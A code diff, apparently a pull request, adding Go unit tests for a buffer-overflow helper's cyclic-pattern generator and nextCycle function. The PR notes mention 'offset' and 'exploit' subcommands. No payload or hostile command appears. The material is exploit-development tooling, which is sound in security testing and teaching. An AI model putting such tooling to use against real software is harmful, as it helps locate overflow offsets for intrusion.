-    if x != 66 || y != 97 || z != 48 {
-        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 66, 97, 48)
-    }
-}
-
-// tests generating the next cycle, with rollovers on all values
-func TestNextCycleRollX(t *testing.T) {
-    // generate next cycle
-    x, y, z := nextCycle(90, 122, 57)
-
-    // if results don't match, test failed
-    if x != 65 || y != 97 || z != 48 {
-        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 65, 97, 48)
-    }
+// test reversing large byte array
+func TestReverseBytesLarge(t *testing.T) {
+    t.Errorf("test not implemented")
 }
 

--- a/internal/overflow/pattern_test.go
+++ b/internal/overflow/pattern_test.go
@@ -1,0 +1,100 @@
+package overflow
+
+import (
+    "testing"
+)
+
+// tests generating an empty cyclic pattern of bytes
+func TestCyclicPatternEmpty(t *testing.T) {
+    // generate empty cyclic pattern of bytes
+    want := ""
+    data := cyclicPattern(0)
+
+    // if strings don't match, test failed
+    if string(data) != want {
+        t.Errorf("string(data) = %s, want %s", string(data), want)
+    }
+}
+
+// tests generating a small cyclic pattern of bytes
+func TestCyclicPatternSmall(t *testing.T) {
+    // generate small cyclic pattern of bytes
+    want := "Aa0Aa1Aa2A"
+    data := cyclicPattern(10)
+
+    // if strings don't match, test failed
+    if string(data) != want {
+        t.Errorf("string(data) = %s, want %s", string(data), want)
+    }
+}
+
+// tests generating a large cyclic pattern of bytes
+func TestCyclicPatternLarge(t *testing.T) {
+    // generate large cyclic pattern of bytes
+    want := "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0" +
+            "Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1" +
+            "Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2" +
+            "Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3" +
+            "Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4" +
+            "Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5" +
+            "Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6" +
+            "Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7" +
+            "Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8" +
+            "As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9" +
+            "Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0" +
+            "Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1" +
+            "Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2" +
+            "Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3" +
+            "Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4" +
+            "Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
+    data := cyclicPattern(1000)
+
+    // if strings don't match, test failed
+    if string(data) != want {
+        t.Errorf("string(data) = %s, want %s", string(data), want)
+    }
+}
+
+// tests generating the next cycle, with no rollover
+func TestNextCycleSimple(t *testing.T) {
+    // generate next cycle
+    x, y, z := nextCycle(65, 97, 51)
+
+    // if results don't match, test failed
+    if x != 65 || y != 97 || z != 52 {
+        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 65, 97, 52)
+    }
+}
+
+// tests generating the next cycle, with a rollover on z
+func TestNextCycleRollZ(t *testing.T) {
+    // generate next cycle
+    x, y, z := nextCycle(65, 97, 57)
+
+    // if results don't match, test failed
+    if x != 65 || y != 98 || z != 48 {
+        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 65, 98, 48)
+    }
+}
+
+// tests generating the next cycle, with rollovers on z and y
+func TestNextCycleRollY(t *testing.T) {
+    // generate next cycle
+    x, y, z := nextCycle(65, 122, 57)
+
+    // if results don't match, test failed
+    if x != 66 || y != 97 || z != 48 {
+        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 66, 97, 48)
+    }
+}
+
+// tests generating the next cycle, with rollovers on all values
+func TestNextCycleRollX(t *testing.T) {
+    // generate next cycle
+    x, y, z := nextCycle(90, 122, 57)
+
+    // if results don't match, test failed
+    if x != 65 || y != 97 || z != 48 {
+        t.Errorf("x, y, z = %d, %d, %d, want %d, %d, %d", x, y, z, 65, 97, 48)
+    }
+}


### PR DESCRIPTION
* Various fixes.
* Implemented `offset` subcommand.
* Added "--reverse" flag for `exploit` subcommand, to reverse byte-order for little-endian systems.
* Implemented tests for `offset` subcommand.